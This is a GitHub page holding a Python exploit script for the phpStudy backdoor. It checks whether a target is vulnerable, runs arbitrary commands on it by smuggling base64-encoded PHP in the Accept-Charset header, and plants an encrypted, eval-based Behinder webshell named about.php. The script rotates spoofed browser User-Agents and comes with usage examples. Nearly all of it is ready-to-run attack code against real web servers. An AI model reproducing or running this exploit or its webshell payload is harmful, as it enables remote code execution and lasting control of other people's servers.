-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathphpstudy_backdoor_getshell.py
More file actions
185 lines (166 loc) · 10.9 KB
/
phpstudy_backdoor_getshell.py
File metadata and controls
185 lines (166 loc) · 10.9 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
'''
@Description:
@Author: demos
@Github: https://github.com/demossl
'''
import requests
import argparse
import base64
import random
import sys
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
USER_AGENTS = [
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)",
"Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
"Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)",
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)",
"Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)",
"Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0",
"Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20",
"Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.11 TaoBrowser/2.0 Safari/536.11",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.71 Safari/537.1 LBBROWSER",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; LBBROWSER)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E; LBBROWSER)",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.84 Safari/535.11 LBBROWSER",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; QQBrowser/7.0.3698.400)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; QQDownload 732; .NET4.0C; .NET4.0E; 360SE)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)",
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1",
"Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; zh-cn) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b13pre) Gecko/20110307 Firefox/4.0b13pre",
"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11",
"Mozilla/5.0 (X11; U; Linux x86_64; zh-CN; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10"
]
TIME_OUT=15
class phpstudy_backdoor_getshell(object):
def __init__(self,url,command):
self._url = url
self._command = command
#访问器 - getter()方法
@property
def url(self):
return self._url
@property
def command(self):
return self._command
#修改器 - setter()方法
@url.setter
def url(self,url):
self._url = url
@command.setter
def command(self,command):
self._command = command
def check_Target(self):
poc = {
"Accept-Charset": "cGhwaW5mbygpOw==",
"Accept-Encoding": "gzip,deflate"
}
try:
PocRequest = requests.get(self._url,headers=poc,timeout=TIME_OUT)
if "phpinfo" in str(PocRequest.content):
print('[+] Target is vulnerable.')
return True
else:
print('[-] Target is NOT vulnerable.')
return False
except:
print('[-] Looks Like Something Wrong.')
def exploit(self):
headers = {}
headers['User-Agent'] = random.choice(USER_AGENTS)
headers['Accept-Encoding'] = 'gzip,deflate'
headers['Accept-Charset'] = self._command
try:
response = requests.get(self._url,headers=headers)
response.encoding = 'gbk'
if response.status_code == 200:
print('[+] Command Execute Successful.')
print(response.text)
else:
print('[-] Looks Like Something Wrong. Maybe target is NOT vulnerable.')
except:
print('[-] Looks Like Something Wrong.\n')
def upload_shell_2018(self):
headers = {}
headers['User-Agent'] = random.choice(USER_AGENTS)
headers['Accept-Encoding'] = 'gzip,deflate'
headers['Accept-Charset'] = 'ZmlsZV9wdXRfY29udGVudHMoJy4vUEhQVHV0b3JpYWwvV1dXL2Fib3V0LnBocCcsICc8P3BocApAZXJyb3JfcmVwb3J0aW5nKDApOwpzZXNzaW9uX3N0YXJ0KCk7CmlmIChpc3NldCgkX0dFVFsicGFzcyJdKSkKewogICAgJGtleT1zdWJzdHIobWQ1KHVuaXFpZChyYW5kKCkpKSwxNik7CiAgICAkX1NFU1NJT05bImsiXT0ka2V5OwogICAgcHJpbnQgJGtleTsKfQplbHNlCnsKICAgICRrZXk9JF9TRVNTSU9OWyJrIl07CgkkcG9zdD1maWxlX2dldF9jb250ZW50cygicGhwOi8vaW5wdXQiKTsKCWlmKCFleHRlbnNpb25fbG9hZGVkKCJvcGVuc3NsIikpCgl7CgkJJHQ9ImJhc2U2NF8iLiJkZWNvZGUiOwoJCSRwb3N0PSR0KCRwb3N0LiIiKTsKCQkKCQlmb3IoJGk9MDskaTxzdHJsZW4oJHBvc3QpOyRpKyspIHsKICAgIAkJCSAkcG9zdFskaV0gPSAkcG9zdFskaV1eJGtleVskaSsxJjE1XTsgCiAgICAJCQl9Cgl9CgllbHNlCgl7CgkJJHBvc3Q9b3BlbnNzbF9kZWNyeXB0KCRwb3N0LCAiQUVTMTI4IiwgJGtleSk7Cgl9CiAgICAkYXJyPWV4cGxvZGUoInwiLCRwb3N0KTsKICAgICRmdW5jPSRhcnJbMF07CiAgICAkcGFyYW1zPSRhcnJbMV07CgljbGFzcyBDe3B1YmxpYyBmdW5jdGlvbiBfX2NvbnN0cnVjdCgkcCkge2V2YWwoJHAuIiIpO319CglAbmV3IEMoJHBhcmFtcyk7Cn0KPz4nKTs='
try:
response = requests.get(self._url,headers=headers)
response.encoding = 'gbk'
if response.status_code == 200:
print('[+] Upload Successful.')
print('[+] The webshell is {}//{}/about.php'.format(self._url.split('/')[0],self._url.split('/')[2]))
else:
print('[-] Looks Like Something Wrong. Maybe target is NOT vulnerable.')
except:
print('[-] Looks Like Something Wrong.\n')
def upload_shell_2016(self):
headers = {}
headers['User-Agent'] = random.choice(USER_AGENTS)
headers['Accept-Encoding'] = 'gzip,deflate'
headers['Accept-Charset'] = 'ZmlsZV9wdXRfY29udGVudHMoJy4vV1dXL2Fib3V0LnBocCcsICc8P3BocApAZXJyb3JfcmVwb3J0aW5nKDApOwpzZXNzaW9uX3N0YXJ0KCk7CmlmIChpc3NldCgkX0dFVFsicGFzcyJdKSkKewogICAgJGtleT1zdWJzdHIobWQ1KHVuaXFpZChyYW5kKCkpKSwxNik7CiAgICAkX1NFU1NJT05bImsiXT0ka2V5OwogICAgcHJpbnQgJGtleTsKfQplbHNlCnsKICAgICRrZXk9JF9TRVNTSU9OWyJrIl07CgkkcG9zdD1maWxlX2dldF9jb250ZW50cygicGhwOi8vaW5wdXQiKTsKCWlmKCFleHRlbnNpb25fbG9hZGVkKCJvcGVuc3NsIikpCgl7CgkJJHQ9ImJhc2U2NF8iLiJkZWNvZGUiOwoJCSRwb3N0PSR0KCRwb3N0LiIiKTsKCQkKCQlmb3IoJGk9MDskaTxzdHJsZW4oJHBvc3QpOyRpKyspIHsKICAgIAkJCSAkcG9zdFskaV0gPSAkcG9zdFskaV1eJGtleVskaSsxJjE1XTsgCiAgICAJCQl9Cgl9CgllbHNlCgl7CgkJJHBvc3Q9b3BlbnNzbF9kZWNyeXB0KCRwb3N0LCAiQUVTMTI4IiwgJGtleSk7Cgl9CiAgICAkYXJyPWV4cGxvZGUoInwiLCRwb3N0KTsKICAgICRmdW5jPSRhcnJbMF07CiAgICAkcGFyYW1zPSRhcnJbMV07CgljbGFzcyBDe3B1YmxpYyBmdW5jdGlvbiBfX2NvbnN0cnVjdCgkcCkge2V2YWwoJHAuIiIpO319CglAbmV3IEMoJHBhcmFtcyk7Cn0KPz4nKTs='
try:
response = requests.get(self._url,headers=headers)
response.encoding = 'gbk'
if response.status_code == 200:
print('[+] Upload Successful.')
print('[+] The webshell is {}//{}/about.php'.format(self._url.split('/')[0],self._url.split('/')[2]))
else:
print('[-] Looks Like Something Wrong. Maybe target is NOT vulnerable.')
except:
print('[-] Looks Like Something Wrong.\n')
def main():
parse = argparse.ArgumentParser(description='EXP for phpstudy_backdoor.')
parse.usage="""phpstudy_backdoor_getshell.py [-h] [-u URL] [-c ...]
example: python3 phpstudy_backdoor_getshell.py -u http://192.168.1.103/index.php -c 'system(\\"whoami\\");'
使用反斜杠和单双引号防止转义的问题,并解决argparse下以空格解析参数不能当做一个字符串的问题
"""
parse.add_argument('-u','--url',help='The Target Url')
parse.add_argument('-c','--command', nargs=argparse.REMAINDER,help='Please input the exploit command')
parse.add_argument('-w8','--webshell_8',action='store_true',help='upload a Behinder webshell for phpstudy2018')
parse.add_argument('-w6','--webshell_6',action='store_true',help='upload a Behinder webshell for phpstudy2016')
args = parse.parse_args()
x = phpstudy_backdoor_getshell('','')
if len(sys.argv) < 2:
print(parse.print_help())
elif len(sys.argv) < 4 and len(sys.argv) > 2:
if args.url:
x.url = args.url
x.check_Target()
else:
print('[-] some error!')
elif len(sys.argv) >= 4:
if args.url and args.command:
commands = ''
for cmd in args.command:
commands += cmd + ' '
command = base64.b64encode(commands.encode('utf-8'))
x.url = args.url
x.command = command
x.exploit()
elif args.url and args.webshell_8:
x.url = args.url
x.upload_shell_2018()
elif args.url and args.webshell_6:
x.url = args.url
x.upload_shell_2016()
else:
print('[-] some error!')
if __name__ == '__main__':
main()